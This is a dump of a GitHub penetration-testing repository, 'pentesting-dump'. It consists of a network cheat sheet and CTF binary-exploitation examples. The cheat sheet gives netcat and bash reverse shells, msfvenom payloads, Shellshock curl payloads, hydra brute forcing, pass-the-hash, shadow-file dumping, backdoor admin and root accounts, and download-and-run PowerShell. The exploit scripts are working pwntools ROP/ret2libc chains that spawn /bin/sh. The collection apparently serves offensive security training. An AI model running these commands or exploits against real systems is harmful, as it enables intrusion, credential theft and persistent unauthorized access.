├── README.md ├── net └── README.md ├── pwnage ├── GDB Cheat Sheet.pdf ├── examples │ ├── bitterman │ │ ├── .gdb_history │ │ ├── exploit.py │ │ ├── exploit2.py │ │ └── libc.so.6 │ ├── ellingson │ │ ├── .gdb_history │ │ ├── exploit.py │ │ └── notes.txt │ ├── format_str │ │ ├── .gdb_history │ │ ├── a.out │ │ ├── format0.c │ │ └── format1.c │ └── ropme │ │ ├── .gdb_history │ │ └── exploit.py ├── gdb_37.html ├── notes.txt ├── registers.png ├── syscalls.txt ├── x64 practice │ ├── .gdb_history │ ├── 28-rra-nonulls.asm │ ├── 28-rra.nasm │ ├── 29-execve.asm │ ├── 31-execve-jcp.asm │ ├── 32-execve-rra.asm │ ├── 34-xor-encoder-jcp.asm │ ├── 34-xor-encoder.asm │ ├── 37-insertion-encoder.asm │ ├── 45-bindshell.c │ ├── 46-bindshell-password.asm │ ├── 46-bindshell.asm │ ├── 47-reverseshell-password-simple.asm │ ├── 47-reverseshell-password.asm │ ├── 47-reverseshell.asm │ ├── 47-reverseshell.c │ ├── GettingEIP.asm │ ├── HelloWorld.asm │ ├── HelloWorldNoNulls.asm │ ├── MovingData.asm │ ├── Stack.asm │ ├── asm-c-run.sh │ ├── asm-debug.sh │ ├── asm-encoder.py │ ├── asm-print.sh │ ├── asm-run.sh │ ├── egghunter-simple.asm │ ├── egghunter.c │ ├── read-write.asm │ ├── shell.asm │ └── shellcode.c └── x64_cheatsheet.pdf ├── reversing └── README.md ├── snippets ├── android │ └── README.md ├── av bypass │ └── README.md ├── bash │ └── README.md ├── c# │ └── README.md ├── c │ └── README.md ├── powershell │ └── README.md ├── python │ └── README.md └── python_crypto │ └── README.MD ├── web ├── README.md ├── burpsuite_free_v1.6.jar ├── clickjacking_bypass.html ├── clickjacking_outter_frame.html ├── csrf.html └── jquery-1.11.2.min.js └── wordlists └── python-keywords.txt /README.md: -------------------------------------------------------------------------------- 1 | Pentesting dump 2 | ======= 3 | 4 | Scripts, tools, and proof-of-concepts that can be handy during a penetration test. -------------------------------------------------------------------------------- /net/README.md: -------------------------------------------------------------------------------- 1 | Infrastructure help 2 | ======= 3 | 4 | * [Infrastructure help](#infrastructure-help) 5 | * [Enumeration](#enumeration) 6 | * [Arp Scan](#arp-scan) 7 | * [Ping Sweep](#ping-sweep) 8 | * [Port Scan](#port-scan) 9 | * [Web](#web) 10 | * [SMB](#smb) 11 | * [SNMP](#snmp) 12 | * [NSE scripts](#nse-scripts) 13 | * [Exploitation](#exploitation) 14 | * [Compiling exploits](#compiling-exploits) 15 | * [Binaries/shellcode](#binariesshellcode) 16 | * [SQL Injection](#sql-injection) 17 | * [Shellshock](#shellshock) 18 | * [Password attacks](#password-attacks) 19 | * [Bruteforce or dictionary](#bruteforce-or-dictionary) 20 | * [Password / hash dump](#password--hash-dump) 21 | * [Pass the hash](#pass-the-hash) 22 | * [Post Exploitation](#post-exploitation) 23 | * [Reverse shells](#reverse-shells) 24 | * [File transfer](#file-transfer) 25 | * [Add User](#add-user) 26 | * [Privilege Escalation](#privilege-escalation) 27 | * [Windows](#windows) 28 | * [Linux](#linux) 29 | * [Tunneling](#tunneling) 30 | * [Remote Port Forward (HOST A - KALI, HOST B - COMPROMISED, HOST C - TARGET )](#remote-port-forward-host-a---kali-host-b---compromised-host-c---target-) 31 | * [Proxychains](#proxychains) 32 | * [Local SSH Port Forward](#local-ssh-port-forward) 33 | 34 | 35 | 36 | 37 | 38 | ## Enumeration 39 | 40 | 41 | ### Arp Scan 42 | ```bash 43 | netdiscover -i eth1 -r 44 | arp -a -i eth1 45 | ``` 46 | 47 | 48 | ### Ping Sweep 49 | 50 | Bash 51 | ```bash 52 | for ip in $(seq 1 254); do ping -c 1 192.168.0.$ip | grep "bytes from" | cut -d" " -f4 |cut -d":" -f1 ; done 53 | ``` 54 | TODO Windows/PS, Python 55 | 56 | 57 | ### Port Scan 58 | 59 | TCP 60 | ```bash 61 | nmap -v -sS -sV -Pn -n -p- 62 | ``` 63 | 64 | UDP 65 | ```bash 66 | nmap -v -sU -Pn -n --top-ports=25 67 | ``` 68 | 69 | Netcat traditional 70 | ```bash 71 | nc -v -n -z -w1 1-10000 72 | ``` 73 | 74 | Netcat OpenBSD 75 | ```bash 76 | nc -v -n -z -w1 > 1-10000 2>&1 |grep succeed 77 | ``` 78 | 79 | 80 | ### Web 81 | Looking for common vulns 82 | ```bash 83 | nmap -sV -Pn -v -p --script http-vuln* 84 | ``` 85 | 86 | Dirbusting 87 | ```bash 88 | dirb http:/// /usr/share/dirb/wordlists/big.txt -S -r -w 89 | ``` 90 | 91 | 92 | ### SMB 93 | ```bash 94 | enum4linux -v -a 95 | ``` 96 | 97 | ```bash 98 | nmap -sV -Pn -vv -p --script=smb-check-vulns,smb-psexec,smb-vuln-ms10-054,smb-vuln-ms10-061 --script-args=unsafe=1 99 | ``` 100 | 101 | 102 | ### SNMP 103 | ```bash 104 | snmpcheck -t 105 | ``` 106 | 107 | ### NSE scripts 108 | ```bash 109 | ls /usr/share/nmap/scripts/ -l | grep 110 | ``` 111 | * smb* 112 | * http* 113 | 114 | ### tcpdump 115 | ```bash 116 | sudo tcpdump -i eth0 -nq -s0 -C100 -w audit_`date +"%Y%m%d_%H%M%S"`.pcap 117 | ``` 118 | 119 | ## Exploitation 120 | 121 | ### Compiling exploits 122 | 123 | Compiling on Windows 124 | ```bash 125 | gcc -m32 -ggdb -o -fno-stack-protector -mpreferred-stack-boundary=2 -z execstack .c 126 | ``` 127 | Compiling on Linux 128 | ```bash 129 | gcc .c -o -lssl -lcrypt 130 | ``` 131 | Compiling Windows flavored C on Linux (note missing libraries) 132 | ```bash 133 | i586-mingw32msvc-gcc .c -o .exe -lwsock32 -lrpcrt4 -lmpr -lws2_32 134 | ``` 135 | 136 | 137 | ### Binaries/shellcode 138 | 139 | Msfvenom 140 | ```bash 141 | msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -f exe -e x86/shikata_ga_nai -a x86 --platform win -b "\x00" > winreverseshell.exe 142 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe -e x86/shikata_ga_nai -a x86 --platform win -b "\x00" > winrmeterpretershell.exe 143 | ``` 144 | 145 | Metasploit Listener 146 | ``` 147 | use exploit/multi/handler 148 | set PAYLOAD 149 | set LHOST 150 | set LPORT 151 | set ExitOnSession false 152 | exploit -j -z 153 | ``` 154 | 155 | Meterpreter reminders 156 | ``` 157 | msfdb init 158 | show options advanced 159 | set ExitOnSession false 160 | set AutoRunScript persistence 161 | ``` 162 | 163 | ### SQL Injection 164 | ```bash 165 | sqlmap -u "http:///index.php" --data="username=admin&password=admin&Submit=Login+In" --level=5 --risk=3 --time-sec 10 --dbms=mysql --os-shell 166 | ``` 167 | 168 | ### Shellshock 169 | ```bash 170 | curl -A '() { :;}; echo -en "\r\n\r\n$(echo;/usr/bin/id)\r\n\r\n"' :/cgi-bin/vuln.cgi 171 | curl -i -X OPTIONS -H "User-Agent: () { :;};echo;/usr/bin/id" "http://:/cgi-bin/vuln.cgi" 172 | ssh noob@ '() { :;}; uname -a' 173 | ``` 174 | 175 | 176 | 177 | 178 | 179 | 180 | ## Password attacks 181 | 182 | ### Bruteforce or dictionary 183 | LM 184 | ```bash 185 | rcracki_mt -h 186 | ``` 187 | 188 | Hydra 189 | ```bash 190 | hydra -V -u -o found-ftp.txt -e nsr -L wordlists/users.txt -P wordlists/passwords.txt -s 21 ftp 191 | 192 | hydra -V -u -o found-ssh.txt -e nsr -L wordlists/users.txt -P wordlists/passwords.txt -s 22 ssh 193 | 194 | hydra -V -u -o found-telnet.txt -e nsr -L wordlists/users.txt -P wordlists/passwords.txt -s 23 telnet 195 | 196 | hydra -V -u -o found-snmp.txt -e nsr -P wordlists/snmp.txt snmp 197 | ``` 198 | 199 | John 200 | ```bash 201 | john --rules --wordlist=/usr/share/wordlists/rockyou.txt --format= 202 | ``` 203 | 204 | Unshadow 205 | ```bash 206 | unshadow /etc/passwd /etc/shadow > unshadowed 207 | ``` 208 | 209 | Hash id (https://github.com/psypanda/hashID) 210 | ```bash 211 | hashid.py -j 212 | ``` 213 | 214 | ### Password / hash dump 215 | ``` 216 | wce -w 217 | PwDump7.exe 218 | ``` 219 | 220 | ### Pass the hash 221 | ``` 222 | pth-winexe -U bob%254095eef2e2be31f7a83d6fb4b9887b:0d3f32016ee8a42ba768d558875d57e5 // cmd 223 | ``` 224 | 225 | 226 | 227 | 228 | 229 | 230 | ## Post Exploitation 231 | 232 | ### Reverse shells 233 | Netcat 234 | ``` 235 | nc -nv -e /bin/bash 236 | nc -nv -e cmd.exe 237 | ``` 238 | 239 | Bash 240 | ``` 241 | /bin/bash -i >& /dev/tcp// 0>&1 242 | ``` 243 | 244 | Improve Linux feedback on shell 245 | ``` 246 | python -c 'import pty; pty.spawn("/bin/bash")' 247 | echo os.system('/bin/bash') 248 | /bin/sh -i 249 | ``` 250 | 251 | ### File transfer 252 | 253 | FTP 254 | ``` 255 | echo open > ftp.txt 256 | echo >> ftp.txt 257 | echo >> ftp.txt 258 | echo bin >> ftp.txt 259 | echo get nc.exe >> ftp.txt 260 | echo bye >> ftp.txt 261 | ftp -s:ftp.txt 262 | ``` 263 | 264 | Powershell 265 | ``` 266 | echo $storageDir = $pwd > wget.ps1 267 | echo $webclient = New-Object System.Net.WebClient >> wget.ps1 268 | echo $url = "http:///accesschk.exe" >> wget.ps1 269 | echo $file = "accesschk.exe" >> wget.ps1 270 | echo $webclient.DownloadFile($url,$file) >> wget.ps1 271 | 272 | powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1 273 | ``` 274 | 275 | 276 | ### Add User 277 | Windows 278 | ``` 279 | net user hacker MNB00zxc /add 280 | net localgroup administrators hacker /add 281 | ``` 282 | Linux 283 | ``` 284 | /usr/sbin/useradd -g 0 -m -o -u 0 hacker 285 | echo "hacker:123456qwe" | /usr/sbin/chpasswd 286 | ``` 287 | 288 | 289 | ## Privilege Escalation 290 | 291 | ### Windows 292 | Find misconfigured services 293 | ```bash 294 | accesschk.exe /accepteula -uwcqv "Authenticated Users" * 295 | ``` 296 | 297 | Find all weak folder permissions per drive. 298 | ```bash 299 | accesschk.exe /accepteula -uwdqs Users c:\ 300 | accesschk.exe /accepteula -uwdqs "Authenticated Users" c:\ 301 | ``` 302 | 303 | Find all weak file permissions per drive. 304 | ```bash 305 | accesschk.exe /accepteula -uwqs Users c:\*.* 306 | accesschk.exe /accepteula -uwqs "Authenticated Users" c:\*.* 307 | ``` 308 | 309 | ### Linux 310 | Find starting at root (/), SGID or SUID, not Symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied) 311 | ```bash 312 | find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null 313 | ``` 314 | 315 | Find passwords in files 316 | ```bash 317 | grep -i -r "password" /**/*.php 2>/dev/null 318 | find . -name "*.php" -print0 | xargs -0 grep -i -n "password" 2>/dev/null 319 | ``` 320 | Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here 321 | ``` 322 | find / -perm -1000 -type d 2>/dev/null 323 | ``` 324 | 325 | SGID (chmod 2000) - run as the group, not the user who started it 326 | ``` 327 | find / -perm -g=s -type f 2>/dev/null 328 | ``` 329 | 330 | SUID (chmod 4000) - run as the owner, not the user who started it 331 | ``` 332 | find / -perm -u=s -type f 2>/dev/null 333 | ``` 334 | 335 | SGID or SUID 336 | ``` 337 | find / -perm -g=s -o -perm -u=s -type f 2>/dev/null 338 | ``` 339 | 340 | Sudo list permissions 341 | ```bash 342 | sudo -l 343 | ``` 344 | 345 | 346 | 347 | 348 | 349 | ## Tunneling 350 | 351 | ### Remote Port Forward (HOST A - KALI, HOST B - COMPROMISED, HOST C - TARGET ) 352 | ``` 353 | COMPROMISED > plink.exe KALI -P 22 -l root -pw rootpass -C -R 3389:TARGET:3389 354 | ``` 355 | 356 | ### Proxychains 357 | ``` 358 | ssh -D -p hacker@COMPROMISED 359 | 360 | proxychains 361 | ``` 362 | 363 | ### Local SSH Port Forward 364 | ``` 365 | ssh -L :: hacker@COMPROMISED 366 | ``` -------------------------------------------------------------------------------- /pwnage/GDB Cheat Sheet.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/vergl4s/pentesting-dump/fea85de7d6ac3edf4c5a965b2e4e95f7689fd22f/pwnage/GDB Cheat Sheet.pdf -------------------------------------------------------------------------------- /pwnage/examples/bitterman/.gdb_history: -------------------------------------------------------------------------------- 1 | checksec 2 | r 3 | r 4 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 5 | pattern_create 500 6 | r 7 | A' 8 | patter_offset ARAAoAAS 9 | pattern_offset ARAAoAAS 10 | pattern_offset 0x5341416f41415241 11 | x/xg $rsp 12 | pattern_offset 0x4141544141704141 13 | x/xw $rsp 14 | x/uw $rsp 15 | c 16 | q 17 | c 18 | q 19 | q 20 | -------------------------------------------------------------------------------- /pwnage/examples/bitterman/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | from pwn import * 3 | 4 | # context(terminal=['bash', 'new-window']) 5 | 6 | # p = gdb.debug('./bitterman', 'b main') 7 | p = process('./bitterman') 8 | 9 | context(os='linux', arch='amd64') 10 | # context.log_level = 'debug' 11 | 12 | # Stage 1 - Leak 13 | plt_main = p64(0x4006ec) 14 | plt_put = p64(0x400520) 15 | got_put = p64(0x600c50) 16 | pop_rdi = p64(0x00400853) 17 | junk = "A"*152 18 | 19 | payload = junk + pop_rdi + got_put + plt_put + plt_main 20 | 21 | 22 | p.recvuntil("> What's your name?") 23 | p.sendline("Positivity") 24 | p.recvuntil("> Please input the length of your message:") 25 | p.sendline("1024") 26 | p.recvuntil("> Please enter your text:") 27 | p.sendline(payload) 28 | p.recvuntil('Thanks!\n') 29 | leaked_puts = p.recvline().rstrip().ljust(8, "\x00") 30 | # To "unpack" it 31 | leaked_puts = u64(leaked_puts) 32 | log.success(leaked_puts) 33 | # raw_input() 34 | 35 | # Stage 2 36 | pop_rdi = p64(0x00400853) 37 | libc_put = 0x71910 38 | libc_sys = 0x449c0 39 | libc_sh = 0x181519 40 | 41 | offset = leaked_puts - libc_put 42 | system = p64(offset + libc_sys) 43 | sh = p64(offset + libc_sh) 44 | 45 | payload = junk + pop_rdi + sh + system 46 | 47 | p.recvuntil("> What's your name?") 48 | p.sendline("Positivity") 49 | p.recvuntil("> Please input the length of your message:") 50 | p.sendline("1024") 51 | p.recvuntil("> Please enter your text:") 52 | p.sendline(payload) 53 | 54 | p.interactive() 55 | 56 | """ 57 | 58 | PLT/GOT explanation: https://www.technovelty.org/linux/plt-and-got-the-key-to-code-sharing-and-dynamic-libraries.html 59 | Linkers part 1: https://www.airs.com/blog/archives/38 60 | 61 | 62 | Overflow 63 | 64 | gdb 65 | checksec 66 | pattern_create 500 67 | RBP: 0x5341416f41415241 ('ARAAoAAS') 68 | x/xg $rsp 69 | 0x7fffffffe168: 0x4141544141704141 70 | 71 | pattern_offset 0x4141544141704141 72 | 4702132125198991681 found at offset: 151 73 | 74 | 75 | Leak puts address 76 | 77 | puts call (in the binary) - to leak an address 78 | 79 | objdump -D bitterman | grep puts 80 | 81 | 0000000000400520 : 82 | 400520: ff 25 2a 07 20 00 jmpq *0x20072a(%rip) # 600c50 83 | 84 | 400520 - plt (Procedure Linkage Table) address (where the call exist in the binary) 85 | 600c50 - got (Global Offsets Table) address 86 | 87 | radare - to find a "pop rdi" gadget 88 | 89 | r2 bitterman 90 | /R pop rdi 91 | 0x00400853 5f pop rdi 92 | 93 | 94 | main - to prevent program from crashing after getting puts leaked address 95 | 96 | objdump -D bitterman | grep main 97 | 98 | 00000000004006ec
: 99 | 100 | Return to libc 101 | 102 | locate libc.so.6 103 | 104 | /usr/lib/x86_64-linux-gnu/libc.so.6 105 | cp /usr/lib/x86_64-linux-gnu/libc.so.6 . 106 | 107 | readelf -s libc.so.6|grep puts 108 | 194: 0000000000071910 413 FUNC GLOBAL DEFAULT 13 _IO_puts@@GLIBC_2.2.5 109 | 426: 0000000000071910 413 FUNC WEAK DEFAULT 13 puts@@GLIBC_2.2.5 <------------- 110 | 501: 00000000000fdfb0 1240 FUNC GLOBAL DEFAULT 13 putspent@@GLIBC_2.2.5 111 | 685: 00000000000ffa90 680 FUNC GLOBAL DEFAULT 13 putsgent@@GLIBC_2.10 112 | 1153: 0000000000070490 338 FUNC WEAK DEFAULT 13 fputs@@GLIBC_2.2.5 113 | 1694: 0000000000070490 338 FUNC GLOBAL DEFAULT 13 _IO_fputs@@GLIBC_2.2.5 114 | 2332: 000000000007a460 151 FUNC WEAK DEFAULT 13 fputs_unlocked@@GLIBC_2.2.5 115 | 116 | 71910 117 | 118 | readelf -s libc.so.6|grep system 119 | 235: 0000000000129a70 99 FUNC GLOBAL DEFAULT 13 svcerr_systemerr@@GLIBC_2.2.5 120 | 613: 00000000000449c0 45 FUNC GLOBAL DEFAULT 13 __libc_system@@GLIBC_PRIVATE 121 | 1418: 00000000000449c0 45 FUNC WEAK DEFAULT 13 system@@GLIBC_2.2.5 <---------------- 122 | 123 | 449c0 124 | 125 | strings -a -t x libc.so.6 | grep /bin/sh 126 | 127 | 181519 128 | 129 | """ 130 | 131 | -------------------------------------------------------------------------------- /pwnage/examples/bitterman/exploit2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | from pwn import * 3 | 4 | # context(terminal=['bash', 'new-window']) 5 | 6 | # p = gdb.debug('./bitterman', 'b main') 7 | p = process('./bitterman') 8 | 9 | context(os='linux', arch='amd64') 10 | # context.log_level = 'debug' 11 | 12 | bitterman = ELF('./bitterman') 13 | rop = ROP(bitterman) 14 | libc = ELF('libc.so.6') 15 | 16 | junk = "A"*152 17 | rop.search(regs=['rdi'], order='regs') 18 | rop.puts(bitterman.got['puts']) 19 | rop.call(bitterman.symbols['main']) 20 | log.info('Stage 1: ROP chain:\n' + rop.dump()) 21 | 22 | 23 | payload = junk + str(rop) 24 | 25 | 26 | p.recvuntil("> What's your name?") 27 | p.sendline("Positivity") 28 | p.recvuntil("> Please input the length of your message:") 29 | p.sendline("1024") 30 | p.recvuntil("> Please enter your text:") 31 | p.sendline(payload) 32 | p.recvuntil('Thanks!\n') 33 | leaked_puts = p.recvline().rstrip().ljust(8, "\x00") 34 | # To "unpack" it 35 | leaked_puts = u64(leaked_puts) 36 | log.success(leaked_puts) 37 | 38 | # Stage 2 39 | libc.address = leaked_puts - libc.symbols['puts'] 40 | rop2 = ROP(libc) 41 | rop2.system(next(libc.search('/bin/sh\x00'))) 42 | log.info("Stage 2 rop chain:\n"+rop2.dump()) 43 | 44 | payload = junk + str(rop2) 45 | 46 | p.recvuntil("> What's your name?") 47 | p.sendline("Positivity") 48 | p.recvuntil("> Please input the length of your message:") 49 | p.sendline("1024") 50 | p.recvuntil("> Please enter your text:") 51 | p.sendline(payload) 52 | 53 | p.interactive() 54 | -------------------------------------------------------------------------------- /pwnage/examples/bitterman/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/vergl4s/pentesting-dump/fea85de7d6ac3edf4c5a965b2e4e95f7689fd22f/pwnage/examples/bitterman/libc.so.6 -------------------------------------------------------------------------------- /pwnage/examples/ellingson/.gdb_history: -------------------------------------------------------------------------------- 1 | r 2 | pattern_create 500 3 | r 4 | x/xg $rsp 5 | pattern_offset 0x416d41415141416c 6 | r 7 | x/xg $rsp 8 | r 9 | r 10 | r 11 | x/xg $rsp 12 | r 13 | r 14 | r 15 | x/xg $rsp 16 | checksec 17 | cp /usr/lib/x86_64-linux-gnu/libc.so.6 ./ 18 | cp /usr/lib/x86_64-linux-gnu/libc.so.6 . 19 | ls 20 | r 21 | r 22 | c 23 | c 24 | q 25 | -------------------------------------------------------------------------------- /pwnage/examples/ellingson/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | from pwn import * 3 | 4 | 5 | # p = gdb.debug('./garbage', 'b main') 6 | p = process('./garbage',) 7 | 8 | context(os='linux', arch='amd64') 9 | # context.log_level = 'debug' 10 | junk = "A"*136 11 | # Stage 1 - Leak 12 | 13 | garbage = ELF('./garbage') 14 | rop = ROP(garbage) 15 | libc = ELF('/usr/lib/x86_64-linux-gnu/libc.so.6') 16 | 17 | rop.search(regs=['rdi'], order='regs') 18 | rop.puts(garbage.got['puts']) 19 | rop.call(garbage.symbols['main']) 20 | log.info('Stage 1: ROP chain:\n' + rop.dump()) 21 | 22 | payload = junk+str(rop) 23 | 24 | p.sendline(payload) 25 | p.recvuntil("denied.\n") 26 | leaked_address = u64(p.recvline().rstrip().ljust(8, "\x00")) 27 | log.info("We got PUTS leaked address baby - {}".format(leaked_address)) 28 | 29 | 30 | # Stage 2 31 | libc.address = leaked_address - libc.symbols['puts'] 32 | rop2 = ROP(libc) 33 | rop2.call(libc.symbols['setuid']) 34 | rop2.system(next(libc.search('/bin/sh\x00'))) 35 | log.info("Stage 2 rop chain:\n"+rop2.dump()) 36 | 37 | payload = junk + str(rop2) 38 | p.sendline(payload) 39 | p.recvuntil("denied.\n") 40 | p.interactive() 41 | 42 | 43 | """ 44 | >>> shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0', port=2220) 45 | >>> shell['whoami'] 46 | 'bandit0' 47 | >>> shell.download_file('/etc/motd') 48 | >>> sh = shell.run('sh') 49 | >>> sh.sendline('sleep 3; echo hello world;') 50 | >>> sh.recvline(timeout=1) 51 | '' 52 | >>> sh.recvline(timeout=5) 53 | 'hello world\n' 54 | >>> shell.close() 55 | """ -------------------------------------------------------------------------------- /pwnage/examples/ellingson/notes.txt: -------------------------------------------------------------------------------- 1 | Stack after overflow - 500*"A" 2 | 3 | [----------------------------------registers-----------------------------------] 4 | RAX: 0x0 5 | RBX: 0x0 6 | RCX: 0x7ffff7ed9504 (<__GI___libc_write+20>: cmp rax,0xfffffffffffff000) 7 | RDX: 0x7ffff7fac8c0 --> 0x0 8 | RSI: 0x4059c0 ("access denied.\nssword: ") 9 | RDI: 0x0 10 | RBP: 0x4141414141414141 ('AAAAAAAA') 11 | RSP: 0x7fffffffe158 ('A' ...) 12 | RIP: 0x401618 (: ret) 13 | R8 : 0x7ffff7fb1500 (0x00007ffff7fb1500) 14 | R9 : 0x7ffff7fab848 --> 0x7ffff7fab760 --> 0xfbad2a84 15 | R10: 0xfffffffffffff638 16 | R11: 0x246 17 | R12: 0x401170 (<_start>: xor ebp,ebp) 18 | R13: 0x7fffffffe250 ('A' ) 19 | R14: 0x0 20 | R15: 0x0 21 | EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow) 22 | [-------------------------------------code-------------------------------------] 23 | 0x40160d : call 0x401050 24 | 0x401612 : mov eax,0x0 25 | 0x401617 : leave 26 | => 0x401618 : ret 27 | 0x401619
: push rbp 28 | 0x40161a : mov rbp,rsp 29 | 0x40161d : sub rsp,0x10 30 | 0x401621 : mov eax,0x0 31 | [------------------------------------stack-------------------------------------] 32 | 0000| 0x7fffffffe158 ('A' ...) 33 | 0008| 0x7fffffffe160 ('A' ...) 34 | 0016| 0x7fffffffe168 ('A' ...) 35 | 0024| 0x7fffffffe170 ('A' ...) 36 | 0032| 0x7fffffffe178 ('A' ...) 37 | 0040| 0x7fffffffe180 ('A' ...) 38 | 0048| 0x7fffffffe188 ('A' ...) 39 | 0056| 0x7fffffffe190 ('A' ...) 40 | [------------------------------------------------------------------------------] 41 | Legend: code, data, rodata, value 42 | Stopped reason: SIGSEGV 43 | 0x0000000000401618 in auth () 44 | 45 | Stack after overflow pattern_create 500 46 | 47 | [----------------------------------registers-----------------------------------] 48 | RAX: 0x0 49 | RBX: 0x0 50 | RCX: 0x7ffff7ed9504 (<__GI___libc_write+20>: cmp rax,0xfffffffffffff000) 51 | RDX: 0x7ffff7fac8c0 --> 0x0 52 | RSI: 0x4059c0 ("access denied.\nssword: ") 53 | RDI: 0x0 54 | RBP: 0x41415041416b4141 ('AAkAAPAA') 55 | RSP: 0x7fffffffe158 ("lAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA"...) 56 | RIP: 0x401618 (: ret) 57 | R8 : 0x7ffff7fb1500 (0x00007ffff7fb1500) 58 | R9 : 0x7ffff7fab848 --> 0x7ffff7fab760 --> 0xfbad2a84 59 | R10: 0xfffffffffffff638 60 | R11: 0x246 61 | R12: 0x401170 (<_start>: xor ebp,ebp) 62 | R13: 0x7fffffffe250 ("%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(AsDAs;As)AsEAsaAs0AsFAsbAs1AsGAscAs2AsHAsdAs3AsIAseAs4AsJAsfAs5AsKAsgAs6A'") 63 | R14: 0x0 64 | R15: 0x0 65 | EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow) 66 | [-------------------------------------code-------------------------------------] 67 | 0x40160d : call 0x401050 68 | 0x401612 : mov eax,0x0 69 | 0x401617 : leave 70 | => 0x401618 : ret 71 | 0x401619
: push rbp 72 | 0x40161a : mov rbp,rsp 73 | 0x40161d : sub rsp,0x10 74 | 0x401621 : mov eax,0x0 75 | [------------------------------------stack-------------------------------------] 76 | 0000| 0x7fffffffe158 ("lAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA"...) 77 | 0008| 0x7fffffffe160 ("ARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%m"...) 78 | 0016| 0x7fffffffe168 ("AApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%"...) 79 | 0024| 0x7fffffffe170 ("qAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA"...) 80 | 0032| 0x7fffffffe178 ("AVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%r"...) 81 | 0040| 0x7fffffffe180 ("AAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%"...) 82 | 0048| 0x7fffffffe188 ("vAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA"...) 83 | 0056| 0x7fffffffe190 